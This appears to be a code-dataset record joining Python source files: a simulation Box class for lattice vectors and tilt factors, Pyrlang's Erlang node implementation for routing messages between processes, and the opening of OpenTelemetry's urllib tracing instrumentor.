lz = np.dot(v3, (v1_x_v2 / np.linalg.norm(v1_x_v2)))
a_3x = np.dot(v1, v3) / lx
xz = a_3x / lz
yz = (np.dot(v2, v3) - a_2x * a_3x) / (ly * lz)
reduced_vecs = np.asarray(
[[lx, 0.0, 0.0], [xy * ly, ly, 0.0], [xz * lz, yz * lz, lz]]
)
return reduced_vecs
def _calc_angles(vectors):
"""Calculate the angles between the vectors that define the box.
Calculates the angles alpha, beta, and gamma from the Box object
attribute box_vectors, rounded to 'precision' number of decimal points.
"""
vector_magnitudes = np.linalg.norm(vectors, axis=1)
v = np.zeros((3, 3))
v[0, :] = vectors[0, :]
v[1, :] = vectors[1, :]
v[2, :] = vectors[2, :]
a_dot_b = np.dot(vectors[0], vectors[1])
b_dot_c = np.dot(vectors[1], vectors[2])
a_dot_c = np.dot(vectors[0], vectors[2])
alpha_raw = b_dot_c / (vector_magnitudes[1] * vector_magnitudes[2])
beta_raw = a_dot_c / (vector_magnitudes[0] * vector_magnitudes[2])
gamma_raw = a_dot_b / (vector_magnitudes[0] * vector_magnitudes[1])
(alpha, beta, gamma) = np.rad2deg(
np.arccos(np.clip([alpha_raw, beta_raw, gamma_raw], -1.0, 1.0))
)
return alpha, beta, gamma
| 32.977221 | 80 | 0.599641 | from warnings import warn
import numpy as np
__all__ = ["Box", "BoxError"]
class BoxError(Exception):
class Box(object):
def __init__(self, lengths, angles=None, precision=None):
if precision is not None:
self._precision = int(precision)
else:
self._precision = 6
if angles is None:
angles = [90.0, 90.0, 90.0]
self._vectors = _lengths_angles_to_vectors(
lengths=lengths, angles=angles, precision=self.precision
)
(Lx, Ly, Lz, xy, xz, yz) = self._from_vecs_to_lengths_tilt_factors()
self._Lx = Lx
self._Ly = Ly
self._Lz = Lz
self._xy = xy
self._xz = xz
self._yz = yz
@classmethod
def from_lengths_angles(cls, lengths, angles, precision=None):
return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_uvec_lengths(cls, uvec, lengths, precision=None):
uvec = np.asarray(uvec)
uvec.reshape(3, 3)
if not np.allclose(np.linalg.norm(uvec, axis=1), 1.0):
raise BoxError(
"Unit vector magnitudes provided are not close to 1.0, "
f"magnitudes: {np.linalg.norm(uvec, axis=1)}"
)
lengths = np.asarray(lengths)
lengths.reshape(1, 3)
_validate_box_vectors(uvec)
scaled_vec = (uvec.T * lengths).T
(alpha, beta, gamma) = _calc_angles(scaled_vec)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_mins_maxs_angles(cls, mins, maxs, angles, precision=None):
(x_min, y_min, z_min) = mins
(x_max, y_max, z_max) = maxs
lengths = (x_max - x_min, y_max - y_min, z_max - z_min)
return cls(lengths=lengths, angles=angles, precision=precision)
@classmethod
def from_vectors(cls, vectors, precision=None):
vectors = _validate_box_vectors(vectors)
(alpha, beta, gamma) = _calc_angles(vectors)
v1 = vectors[0, :]
v2 = vectors[1, :]
v3 = vectors[2, :]
Lx = np.linalg.norm(v1)
Ly = np.linalg.norm(v2)
Lz = np.linalg.norm(v3)
lengths = (Lx, Ly, Lz)
return cls(
lengths=lengths, angles=(alpha, beta, gamma), precision=precision
)
@classmethod
def from_lengths_tilt_factors(
cls, lengths, tilt_factors=None, precision=None
):
(Lx, Ly, Lz) = lengths
if tilt_factors is None:
(xy, xz, yz) = (0.0, 0.0, 0.0)
else:
(xy, xz, yz) = tilt_factors
vecs = np.asarray(
[[Lx, 0.0, 0.0], [Ly * xy, Ly, 0.0], [Lz * xz, Lz * yz, Lz]]
)
(alpha, beta, gamma) = _calc_angles(vecs)
return cls(
lengths=lengths, angles=[alpha, beta, gamma], precision=precision
)
@classmethod
def from_lo_hi_tilt_factors(cls, lo, hi, tilt_factors, precision=None):
    """Generate a box from the lo/hi bound convention and tilt factors."""
    (xlo, ylo, zlo) = lo
    (xhi, yhi, zhi) = hi
    (xy, xz, yz) = tilt_factors
    # Undo the bounding-box padding introduced by the tilt factors.
    xlo_bound = xlo + min([0.0, xy, xz, xy + xz])
    xhi_bound = xhi + max([0.0, xy, xz, xy + xz])
    ylo_bound = ylo + min([0.0, yz])
    yhi_bound = yhi + max([0.0, yz])
    lengths = [xhi_bound - xlo_bound, yhi_bound - ylo_bound, zhi - zlo]
    # Bug fix: ``precision`` was previously accepted but silently dropped.
    return cls.from_lengths_tilt_factors(
        lengths=lengths, tilt_factors=tilt_factors, precision=precision
    )
@property
def vectors(self):
return self._vectors
@property
def box_parameters(self):
    """Lengths and tilt factors of the box: (Lx, Ly, Lz, xy, xz, yz)."""
    # Bug fix: the last element was ``self.xy`` repeated instead of ``self.yz``.
    return self.Lx, self.Ly, self.Lz, self.xy, self.xz, self.yz
@property
def Lx(self):
return round(self._Lx, self.precision)
@property
def Ly(self):
return round(self._Ly, self.precision)
@property
def Lz(self):
return round(self._Lz, self.precision)
@property
def lengths(self):
return self.Lx, self.Ly, self.Lz
@property
def xy(self):
return round(self._xy, self.precision)
@property
def xz(self):
return round(self._xz, self.precision)
@property
def yz(self):
return round(self._yz, self.precision)
@property
def tilt_factors(self):
return self.xy, self.xz, self.yz
@property
def angles(self):
(alpha, beta, gamma) = self._get_angles()
alpha = round(alpha, self.precision)
beta = round(beta, self.precision)
gamma = round(gamma, self.precision)
return alpha, beta, gamma
@property
def precision(self):
return self._precision
@precision.setter
def precision(self, value):
    """Set the decimal precision; ``None`` selects the 16-digit default.

    Bug fix: the old truthiness test (``if not value``) silently mapped a
    legitimate ``precision = 0`` to 16; only ``None`` should do that.
    """
    self._precision = 16 if value is None else int(value)
@property
def bravais_parameters(self):
(alpha, beta, gamma) = self.angles
(Lx, Ly, Lz) = self.lengths
return Lx, Ly, Lz, alpha, beta, gamma
def __repr__(self):
(Lx, Ly, Lz, xy, xz, yz) = self.box_parameters
format_precision = f".{self._precision}f" if self._precision else ""
desc = (
f"Box: Lx={Lx:{format_precision}}, "
f"Ly={Ly:{format_precision}}, "
f"Lz={Lz:{format_precision}}, "
f"xy={xy:{format_precision}}, "
f"xz={xz:{format_precision}}, "
f"yz={yz:{format_precision}}, "
)
return desc
def _from_vecs_to_lengths_tilt_factors(self):
v = np.zeros((3, 3))
v[0, :] = self._vectors[0, :]
v[1, :] = self._vectors[1, :]
v[2, :] = self._vectors[2, :]
Lx = np.sqrt(np.dot(v[0], v[0]))
a2x = np.dot(v[0], v[1]) / Lx
Ly = np.sqrt(np.dot(v[1], v[1]) - a2x * a2x)
xy = a2x / Ly
v0xv1 = np.cross(v[0], v[1])
v0xv1mag = np.sqrt(np.dot(v0xv1, v0xv1))
Lz = np.dot(v[2], v0xv1) / v0xv1mag
a3x = np.dot(v[0], v[2]) / Lx
xz = a3x / Lz
yz = (np.dot(v[1], v[2]) - a2x * a3x) / (Ly * Lz)
len_x = np.sqrt(np.dot(v[0], v[0]))
len_y = np.sqrt(np.dot(v[1], v[1]))
len_z = np.sqrt(np.dot(v[2], v[2]))
return len_x, len_y, len_z, xy, xz, yz
def _get_angles(self):
return _calc_angles(self.vectors)
def _validate_box_vectors(box_vectors):
vecs = np.asarray(box_vectors, dtype=np.float64)
vecs.reshape(3, 3)
return _normalize_box(vecs)
def _lengths_angles_to_vectors(lengths, angles, precision):
(a, b, c) = lengths
(alpha, beta, gamma) = np.deg2rad(angles)
cos_a = np.clip(np.cos(alpha), -1.0, 1.0)
cos_b = np.clip(np.cos(beta), -1.0, 1.0)
cos_g = np.clip(np.cos(gamma), -1.0, 1.0)
sin_a = np.clip(np.sin(alpha), -1.0, 1.0)
sin_b = np.clip(np.sin(beta), -1.0, 1.0)
sin_g = np.clip(np.sin(gamma), -1.0, 1.0)
a_vec = np.asarray([a, 0.0, 0.0])
b_x = b * cos_g
b_y = b * sin_g
b_vec = np.asarray([b_x, b_y, 0.0])
c_x = c * cos_b
c_cos_y_term = (cos_a - (cos_b * cos_g)) / sin_g
c_y = c * c_cos_y_term
c_z = c * np.sqrt(1 - np.square(cos_b) - np.square(c_cos_y_term))
c_vec = np.asarray([c_x, c_y, c_z])
box_vectors = np.asarray((a_vec, b_vec, c_vec))
box_vectors.reshape(3, 3)
_validate_box_vectors(box_vectors=box_vectors)
return box_vectors.round(precision)
def _normalize_box(vectors):
det = np.linalg.det(vectors)
if np.isclose(det, 0.0, atol=1e-5):
raise BoxError(
"The vectors to define the box are co-linear, this does not form a "
f"3D region in space.\n Box vectors evaluated: {vectors}"
)
if det < 0.0:
warn(
"Box vectors provided for a left-handed basis, these will be "
"transformed into a right-handed basis automatically."
)
Q, R = np.linalg.qr(vectors.T)
sign = np.linalg.det(Q)
R = R * sign
signs = np.diag(
np.diag(np.where(R < 0, -np.ones(R.shape), np.ones(R.shape)))
)
transformed_vecs = R.dot(signs)
return _reduced_form_vectors(transformed_vecs.T)
def _reduced_form_vectors(box_vectors):
v1 = box_vectors[0, :]
v2 = box_vectors[1, :]
v3 = box_vectors[2, :]
lx = np.linalg.norm(v1)
a_2x = np.dot(v1, v2) / lx
ly = np.sqrt(np.dot(v2, v2) - a_2x * a_2x)
xy = a_2x / ly
v1_x_v2 = np.cross(v1, v2)
lz = np.dot(v3, (v1_x_v2 / np.linalg.norm(v1_x_v2)))
a_3x = np.dot(v1, v3) / lx
xz = a_3x / lz
yz = (np.dot(v2, v3) - a_2x * a_3x) / (ly * lz)
reduced_vecs = np.asarray(
[[lx, 0.0, 0.0], [xy * ly, ly, 0.0], [xz * lz, yz * lz, lz]]
)
return reduced_vecs
def _calc_angles(vectors):
vector_magnitudes = np.linalg.norm(vectors, axis=1)
v = np.zeros((3, 3))
v[0, :] = vectors[0, :]
v[1, :] = vectors[1, :]
v[2, :] = vectors[2, :]
a_dot_b = np.dot(vectors[0], vectors[1])
b_dot_c = np.dot(vectors[1], vectors[2])
a_dot_c = np.dot(vectors[0], vectors[2])
alpha_raw = b_dot_c / (vector_magnitudes[1] * vector_magnitudes[2])
beta_raw = a_dot_c / (vector_magnitudes[0] * vector_magnitudes[2])
gamma_raw = a_dot_b / (vector_magnitudes[0] * vector_magnitudes[1])
(alpha, beta, gamma) = np.rad2deg(
np.arccos(np.clip([alpha_raw, beta_raw, gamma_raw], -1.0, 1.0))
)
return alpha, beta, gamma
| true | true |
1c30571b5d87ee2f1d181f41c63368ad40e3594c | 14,116 | py | Python | Pyrlang/node.py | s2hc-johan/Pyrlang | cd77f44b06677d313b241078282e4cb2bd7bd7a1 | [
"Apache-2.0"
] | null | null | null | Pyrlang/node.py | s2hc-johan/Pyrlang | cd77f44b06677d313b241078282e4cb2bd7bd7a1 | [
"Apache-2.0"
] | null | null | null | Pyrlang/node.py | s2hc-johan/Pyrlang | cd77f44b06677d313b241078282e4cb2bd7bd7a1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018, Erlang Solutions Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import gevent
from gevent import Greenlet
from typing import Dict, Union
from Pyrlang import logger, mailbox
from Pyrlang.Term import *
from Pyrlang.Dist.distribution import ErlangDistribution
from Pyrlang.Dist.node_opts import NodeOpts
from Pyrlang.process import Process
LOG = logger.tty
DEBUG = logger.nothing
WARN = logger.nothing
ERROR = logger.tty
class NodeException(Exception):
    """Raised for node-level errors: duplicate singleton, bad send target,
    unknown monitor target, or an unreachable remote node."""
    pass
class Node(Greenlet):
""" Implements an Erlang node which has a network name, a dictionary of
processes and registers itself via EPMD.
Node handles the networking asynchronously.
This is the root object of an Erlang node, it must be created first and
must outlive all other objects it manages, for them to be accessible
over the network.
Usage example:
1. Monkey patch with the help of Gevent: ``from gevent import monkey``
and then ``monkey.patch_all()``.
2. Create a node class with a name and a cookie
``node = Pyrlang.Node("py@127.0.0.1", "COOKIE")``
3. Start it with ``node.start()``
4. Now anything that you do (for example an infinite loop with
``gevent.sleep(1)`` in it, will give CPU time to the node.
.. note:: Node is a singleton, you can find the current node by
referencing ``Node.singleton``. This may change in future.
"""
singleton = None
""" Access this to find the current node. This may change in future. """
def __init__(self, name: str, cookie: str) -> None:
    """Create the singleton node, connect to EPMD and spawn the built-in
    ``rex`` and ``net_kernel`` service processes.

    :param name: Full node name, ``name@hostname``
    :param cookie: Erlang distribution cookie shared with peer nodes
    :raises NodeException: if a Node singleton already exists
    """
    Greenlet.__init__(self)
    if Node.singleton is not None:
        raise NodeException("Singleton Node was already created")
    Node.singleton = self
    # Message queue based on ``gevent.Queue``. It is periodically checked
    # in the ``_run`` method and the receive handler is called.
    self.inbox_ = mailbox.Mailbox()
    # An internal counter used to generate unique process ids
    self.pid_counter_ = 0
    # Process dictionary which stores all the existing ``Process`` objects
    # adressable by a pid.
    #
    # .. note:: This creates a python reference to an
    #     object preventing its automatic garbage collection.
    #     In the end of its lifetime an object must be explicitly removed
    #     from this dictionary using ``Process.exit`` method on the
    #     process.
    self.processes_ = {}  # type: Dict[Pid, Process]
    # Registered objects dictionary, which maps atoms to pids
    self.reg_names_ = {}  # type: Dict[Atom, Pid]
    self.is_exiting_ = False
    # An option object with feature support flags packed into an
    # integer.
    self.node_opts_ = NodeOpts(cookie=cookie)
    # Node name as seen on the network. Use full node names here:
    # ``name@hostname``
    self.name_ = Atom(name)
    # Connections to other nodes, keyed by the remote node name (str)
    self.dist_nodes_ = {}  # type: Dict[str, Node]
    self.dist_ = ErlangDistribution(node=self, name=name)
    # This is important before we can begin spawning processes
    # to get the correct node creation
    self.dist_.connect(self)
    # Spawn and register (automatically) the process 'rex' for remote
    # execution, which takes 'rpc:call's from Erlang
    from Pyrlang.rex import Rex
    self.rex_ = Rex(self)
    self.rex_.start()
    # Spawn and register (automatically) the 'net_kernel' process which
    # handles special ping messages
    from Pyrlang.net_kernel import NetKernel
    self.net_kernel_ = NetKernel(self)
    self.net_kernel_.start()
def _run(self):
    """Greenlet main loop: drain the inbox, then yield to other greenlets."""
    while not self.is_exiting_:
        self.handle_inbox()
        gevent.sleep(0.0)
def handle_inbox(self):
    """Dispatch queued mailbox messages until a ``None`` sentinel arrives."""
    while True:
        # Block, but then gevent will allow other green-threads to
        # run, so rather than unnecessarily consuming CPU block
        msg = self.inbox_.get()
        if msg is None:
            break
        self.handle_one_inbox_message(msg)
def handle_one_inbox_message(self, m: tuple):
    """Handler is called whenever a message arrives to the mailbox.

    Recognized messages:
    * ``('node_connected', Addr, Connection)`` -- remember the
      distribution connection to another node.
    * ``('node_disconnected', Addr)`` -- forget that connection.
    """
    if m[0] == 'node_connected':
        (_, addr, connection) = m
        self.dist_nodes_[addr] = connection
    elif m[0] == 'node_disconnected':
        (_, addr) = m
        # Robustness: a disconnect for an unknown (already removed) node
        # must not crash the node main loop with a KeyError.
        self.dist_nodes_.pop(addr, None)
def register_new_process(self, proc) -> Pid:
    """ Generate a new pid and add the process to the process dictionary.

        :type proc: Process or None
        :param proc: A new process which needs a pid, or None if you only
            need a fake pid
        :return: A new pid (does not modify the process in place, so please
            store the pid!)
    """
    counter = self.pid_counter_
    self.pid_counter_ = counter + 1
    new_pid = Pid(
        node=self.name_,
        id=counter // 0x7fffffff,
        serial=counter % 0x7fffffff,
        creation=self.dist_.creation_,
    )
    if proc is not None:
        self.processes_[new_pid] = proc
    return new_pid
def on_exit_process(self, pid, reason):
    """Forget a terminated process: log the reason, drop any registered
    names pointing at it, and remove the pid from the process table.
    """
    # Interpolate before calling: other LOG/DEBUG call sites in this class
    # pass a single pre-formatted string, not printf-style arguments.
    LOG("Process %s exited with %s" % (pid, reason))
    # ``register_name`` promises names are "automatically removed when the
    # referenced process is removed" -- honor that promise here.
    stale = [name for name, p in self.reg_names_.items() if p == pid]
    for name in stale:
        del self.reg_names_[name]
    del self.processes_[pid]
def register_name(self, proc, name) -> None:
    """ Add a name into registrations table (automatically removed when the
        referenced process is removed)

        :type proc: Process
        :param proc: The process to register
        :type name: Atom
        :param name: The name to register with
    """
    # NOTE(review): an existing registration under the same name is
    # silently overwritten -- confirm this is intended.
    self.reg_names_[name] = proc.pid_
def stop(self) -> None:
    """ Sets the mark that the node is done (stops the ``_run`` loop),
        closes distribution connections.
    """
    self.is_exiting_ = True
    self.dist_.disconnect()
def where_is(self, ident) -> Union[Process, None]:
    """ Look up a registered name or pid.

        :param ident: An Atom (registered name) or a Pid
        :rtype: Process or None
    """
    # A registered Atom first resolves to the pid it names; an
    # unregistered Atom falls through and yields None below.
    if isinstance(ident, Atom):
        ident = self.reg_names_.get(ident, ident)
    if isinstance(ident, Pid):
        return self.processes_.get(ident)
    return None
def _send_local_registered(self, receiver, message) -> None:
    """ Try find a named process by atom key, drop a message into its inbox_

        :param receiver: A name, atom, of the receiver process
        :param message: The message
        :raises NodeException: if ``receiver`` is not an Atom
    """
    if not isinstance(receiver, Atom):
        raise NodeException("_send_local_registered receiver must be an "
                            "atom")
    receiver_obj = self.where_is(receiver)
    if receiver_obj is not None:
        LOG("Node: send local reg=%s receiver=%s msg=%s" % (receiver, receiver_obj, message))
        receiver_obj.inbox_.put(message)
    else:
        # Unknown names are dropped silently (logged only) by design.
        WARN("Node: send to unregistered name %s ignored" % receiver)
def _send_local(self, receiver, message) -> None:
    """ Try find a process by pid and drop a message into its ``inbox_``.

        :param receiver: Pid who will receive the message
        :param message: The message
        :raises NodeException: if ``receiver`` is not a Pid
    """
    if not isinstance(receiver, Pid):
        raise NodeException("send's receiver must be a pid")
    dst = self.where_is(receiver)
    if dst is not None:
        DEBUG("Node._send_local: pid %s <- %s" % (receiver, message))
        dst.inbox_.put(message)
    else:
        # Messages to dead/unknown pids are dropped (logged only).
        WARN("Node._send_local: pid %s does not exist" % receiver)
def send(self, sender, receiver, message) -> None:
    """ Deliver a message to a pid or to a registered name. The pid may be
        located on another Erlang node.

        :param sender: Message sender
        :type sender: Pid
        :type receiver: Pid or Atom or tuple[Atom, Pid or Atom]
        :param receiver: Message receiver, a pid, or a name, or a tuple with
            node name and a receiver on the remote node.
        :param message: Any value which will be placed into the receiver
            inbox. Pyrlang processes use tuples but that is not enforced
            for your own processes.
        :raises NodeException: if the receiver type is not recognized
    """
    DEBUG("send -> %s: %s" % (receiver, message))
    # Case 1: (NodeName, Name-or-Pid) tuple -- route by node name.
    if isinstance(receiver, tuple):
        (r_node, r_name) = receiver
        if r_node == self.name_:  # atom compare
            # re-route locally
            return self.send(sender, r_name, message)
        else:
            # route remotely
            return self._send_remote(sender=sender,
                                     dst_node=str(r_node),
                                     receiver=r_name,
                                     message=message)
    # Case 2: bare Pid -- local or remote depending on its node field.
    if isinstance(receiver, Pid):
        if receiver.is_local_to(self):
            return self._send_local(receiver, message)
        else:
            return self._send_remote(sender=sender,
                                     dst_node=str(receiver.node_),
                                     receiver=receiver,
                                     message=message)
    # Case 3: bare Atom -- a locally registered name.
    if isinstance(receiver, Atom):
        return self._send_local_registered(receiver, message)
    raise NodeException("Don't know how to send to %s" % receiver)
def _send_remote(self, sender, dst_node: str, receiver, message) -> None:
    """ Wrap the message into a distribution 'send' command and queue it
        on the connection to ``dst_node`` (connecting if needed).
    """
    DEBUG("Node._send_remote %s <- %s" % (receiver, message))
    m = ('send', sender, receiver, message)
    return self.dist_command(receiver_node=dst_node,
                             message=m)
def get_cookie(self):
    """ Get string cookie value for this node.
        TODO: Cookie per connection?
    """
    return self.node_opts_.cookie_
def dist_command(self, receiver_node: str, message: tuple) -> None:
    """ Locate the connection to the given node (a string).
        Place a tuple crafted by the caller into message box for Erlang
        distribution socket. It will pick up and handle the message whenever
        possible.

        :param receiver_node: Name of a remote node
        :param message: A crafted tuple with command name and some more
            values
        :raises NodeException: if the connection to the node failed
    """
    if receiver_node not in self.dist_nodes_:
        LOG("Node: connect to node", receiver_node)
        handler = self.dist_.connect_to_node(
            this_node=self,
            remote_node=receiver_node)
        if handler is None:
            raise NodeException("Node not connected %s" % receiver_node)
        # block until connected, and get the connected message
        LOG("Node: wait for 'node_connected'")
        # Busy-wait (with yields) until the 'node_connected' message has
        # been processed and the connection appears in dist_nodes_.
        while receiver_node not in self.dist_nodes_:
            gevent.sleep(0.1)
        LOG("Node: connected")
    conn = self.dist_nodes_[receiver_node]
    conn.inbox_.put(message)
def monitor_process(self, origin, target):
    """ Locate the process referenced by the target and place the origin
        pid into its ``monitors_`` collection. When something happens to the
        ``target``, a special message will be sent to the ``origin``.

        :type origin: Pid
        :param origin: The (possibly remote) process who will be monitoring
            the target from now
        :type target: Pid or Atom
        :param target: Name or pid of a monitor target process
        :raises NodeException: if the target does not exist
    """
    target_proc = self.where_is(target)
    LOG("MonitorP: orig=%s targ=%s -> %s" % (origin, target, target_proc))
    if target_proc is not None:
        target_proc.monitors_.add(origin)
    else:
        msg = "Monitor target %s does not exist" % target
        raise NodeException(msg)
    # if the origin is local, also track the target on the origin side so
    # both ends of the monitor relationship are known
    if origin.is_local_to(self):
        origin_p = self.where_is(origin)
        origin_p.monitor_targets_.add(target_proc.pid_)
def demonitor_process(self, origin, target):
    """ Locate the process ``target`` and remove the ``origin`` from its
        ``monitors_`` collection. This does not trigger any notifications
        or signals to the ``origin``.

        :type origin: Pid
        :param origin: The process who was monitoring the target previously
        :type target: Pid or Atom
        :param target: Name or pid of a monitor target process, possibly
            it does not exist
        :raises NodeException: if the target does not exist
    """
    target_proc = self.where_is(target)
    if target_proc is not None:
        # ``discard`` (not ``remove``): absent origin is not an error
        target_proc.monitors_.discard(origin)
    else:
        msg = "Demonitor target %s does not exist" % target
        raise NodeException(msg)
    # if the origin is local, unregister monitor from it
    if origin.is_local_to(self):
        origin_p = self.where_is(origin)
        origin_p.monitor_targets_.discard(target_proc.pid_)
__all__ = ['Node', 'NodeException']
| 38.048518 | 97 | 0.602295 |
from __future__ import print_function
import gevent
from gevent import Greenlet
from typing import Dict, Union
from Pyrlang import logger, mailbox
from Pyrlang.Term import *
from Pyrlang.Dist.distribution import ErlangDistribution
from Pyrlang.Dist.node_opts import NodeOpts
from Pyrlang.process import Process
LOG = logger.tty
DEBUG = logger.nothing
WARN = logger.nothing
ERROR = logger.tty
class NodeException(Exception):
pass
class Node(Greenlet):
singleton = None
def __init__(self, name: str, cookie: str) -> None:
Greenlet.__init__(self)
if Node.singleton is not None:
raise NodeException("Singleton Node was already created")
Node.singleton = self
self.inbox_ = mailbox.Mailbox()
self.pid_counter_ = 0
self.processes_ = {}
self.reg_names_ = {}
self.is_exiting_ = False
self.node_opts_ = NodeOpts(cookie=cookie)
self.name_ = Atom(name)
self.dist_nodes_ = {}
self.dist_ = ErlangDistribution(node=self, name=name)
self.dist_.connect(self)
from Pyrlang.rex import Rex
self.rex_ = Rex(self)
self.rex_.start()
from Pyrlang.net_kernel import NetKernel
self.net_kernel_ = NetKernel(self)
self.net_kernel_.start()
def _run(self):
while not self.is_exiting_:
self.handle_inbox()
gevent.sleep(0.0)
def handle_inbox(self):
while True:
msg = self.inbox_.get()
if msg is None:
break
self.handle_one_inbox_message(msg)
def handle_one_inbox_message(self, m: tuple):
if m[0] == 'node_connected':
(_, addr, connection) = m
self.dist_nodes_[addr] = connection
elif m[0] == 'node_disconnected':
(_, addr) = m
del self.dist_nodes_[addr]
def register_new_process(self, proc) -> Pid:
pid1 = Pid(node=self.name_,
id=self.pid_counter_ // 0x7fffffff,
serial=self.pid_counter_ % 0x7fffffff,
creation=self.dist_.creation_)
self.pid_counter_ += 1
if proc is not None:
self.processes_[pid1] = proc
return pid1
def on_exit_process(self, pid, reason):
    """Forget a terminated process: log, drop its registered names, and
    remove the pid from the process table."""
    # Interpolate before calling: the other LOG call sites pass one
    # pre-formatted string, not printf-style arguments.
    LOG("Process %s exited with %s" % (pid, reason))
    # Clean up any registered names still pointing at the dead pid.
    stale = [name for name, p in self.reg_names_.items() if p == pid]
    for name in stale:
        del self.reg_names_[name]
    del self.processes_[pid]
def register_name(self, proc, name) -> None:
self.reg_names_[name] = proc.pid_
def stop(self) -> None:
self.is_exiting_ = True
self.dist_.disconnect()
def where_is(self, ident) -> Union[Process, None]:
if isinstance(ident, Atom) and ident in self.reg_names_:
ident = self.reg_names_[ident]
if isinstance(ident, Pid) and ident in self.processes_:
return self.processes_[ident]
return None
def _send_local_registered(self, receiver, message) -> None:
if not isinstance(receiver, Atom):
raise NodeException("_send_local_registered receiver must be an "
"atom")
receiver_obj = self.where_is(receiver)
if receiver_obj is not None:
LOG("Node: send local reg=%s receiver=%s msg=%s" % (receiver, receiver_obj, message))
receiver_obj.inbox_.put(message)
else:
WARN("Node: send to unregistered name %s ignored" % receiver)
def _send_local(self, receiver, message) -> None:
if not isinstance(receiver, Pid):
raise NodeException("send's receiver must be a pid")
dst = self.where_is(receiver)
if dst is not None:
DEBUG("Node._send_local: pid %s <- %s" % (receiver, message))
dst.inbox_.put(message)
else:
WARN("Node._send_local: pid %s does not exist" % receiver)
def send(self, sender, receiver, message) -> None:
DEBUG("send -> %s: %s" % (receiver, message))
if isinstance(receiver, tuple):
(r_node, r_name) = receiver
if r_node == self.name_: # atom compare
# re-route locally
return self.send(sender, r_name, message)
else:
# route remotely
return self._send_remote(sender=sender,
dst_node=str(r_node),
receiver=r_name,
message=message)
if isinstance(receiver, Pid):
if receiver.is_local_to(self):
return self._send_local(receiver, message)
else:
return self._send_remote(sender=sender,
dst_node=str(receiver.node_),
receiver=receiver,
message=message)
if isinstance(receiver, Atom):
return self._send_local_registered(receiver, message)
raise NodeException("Don't know how to send to %s" % receiver)
def _send_remote(self, sender, dst_node: str, receiver, message) -> None:
DEBUG("Node._send_remote %s <- %s" % (receiver, message))
m = ('send', sender, receiver, message)
return self.dist_command(receiver_node=dst_node,
message=m)
def get_cookie(self):
return self.node_opts_.cookie_
def dist_command(self, receiver_node: str, message: tuple) -> None:
if receiver_node not in self.dist_nodes_:
LOG("Node: connect to node", receiver_node)
handler = self.dist_.connect_to_node(
this_node=self,
remote_node=receiver_node)
if handler is None:
raise NodeException("Node not connected %s" % receiver_node)
LOG("Node: wait for 'node_connected'")
while receiver_node not in self.dist_nodes_:
gevent.sleep(0.1)
LOG("Node: connected")
conn = self.dist_nodes_[receiver_node]
conn.inbox_.put(message)
def monitor_process(self, origin, target):
target_proc = self.where_is(target)
LOG("MonitorP: orig=%s targ=%s -> %s" % (origin, target, target_proc))
if target_proc is not None:
target_proc.monitors_.add(origin)
else:
msg = "Monitor target %s does not exist" % target
raise NodeException(msg)
if origin.is_local_to(self):
origin_p = self.where_is(origin)
origin_p.monitor_targets_.add(target_proc.pid_)
def demonitor_process(self, origin, target):
    """Remove ``origin`` from the monitor set of ``target``'s process."""
    target_proc = self.where_is(target)
    if target_proc is None:
        raise NodeException("Demonitor target %s does not exist" % target)
    target_proc.monitors_.discard(origin)
    if origin.is_local_to(self):
        # Drop the reverse link held by the local origin process.
        self.where_is(origin).monitor_targets_.discard(target_proc.pid_)
__all__ = ['Node', 'NodeException']
| true | true |
1c305748b52524a688ce7cff735634434032d6d5 | 7,147 | py | Python | instrumentation/opentelemetry-instrumentation-urllib/src/opentelemetry/instrumentation/urllib/__init__.py | toumorokoshi/opentelemetry-python-contrib | 7159372e3b381119715c99a37603b3d2d6b9ea46 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | instrumentation/opentelemetry-instrumentation-urllib/src/opentelemetry/instrumentation/urllib/__init__.py | toumorokoshi/opentelemetry-python-contrib | 7159372e3b381119715c99a37603b3d2d6b9ea46 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | instrumentation/opentelemetry-instrumentation-urllib/src/opentelemetry/instrumentation/urllib/__init__.py | toumorokoshi/opentelemetry-python-contrib | 7159372e3b381119715c99a37603b3d2d6b9ea46 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This library allows tracing HTTP requests made by the
`urllib <https://docs.python.org/3/library/urllib.html>`_ library.
Usage
-----
.. code-block:: python
from urllib import request
from opentelemetry.instrumentation.urllib import URLLibInstrumentor
# You can optionally pass a custom TracerProvider to
# URLLibInstrumentor().instrument()
URLLibInstrumentor().instrument()
req = request.Request('https://postman-echo.com/post', method="POST")
r = request.urlopen(req)
API
---
"""
import functools
import types
from urllib.request import ( # pylint: disable=no-name-in-module,import-error
OpenerDirector,
Request,
)
from opentelemetry import context
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.urllib.version import ( # pylint: disable=no-name-in-module,import-error
__version__,
)
from opentelemetry.instrumentation.utils import http_status_to_status_code
from opentelemetry.propagate import inject
from opentelemetry.trace import SpanKind, get_tracer
from opentelemetry.trace.status import Status
# A key to a context variable to avoid creating duplicate spans when instrumenting
_SUPPRESS_URLLIB_INSTRUMENTATION_KEY = "suppress_urllib_instrumentation"
class URLLibInstrumentor(BaseInstrumentor):
    """An instrumentor for urllib.

    Thin ``BaseInstrumentor`` adapter that delegates the actual patching of
    ``OpenerDirector.open`` to the module-level helpers.

    See `BaseInstrumentor`
    """

    def _instrument(self, **kwargs):
        """Instruments urllib module.

        Args:
            **kwargs: Optional arguments
                ``tracer_provider``: a TracerProvider, defaults to global
                ``span_callback``: An optional callback invoked before returning
                    the http response. Invoked with Span and
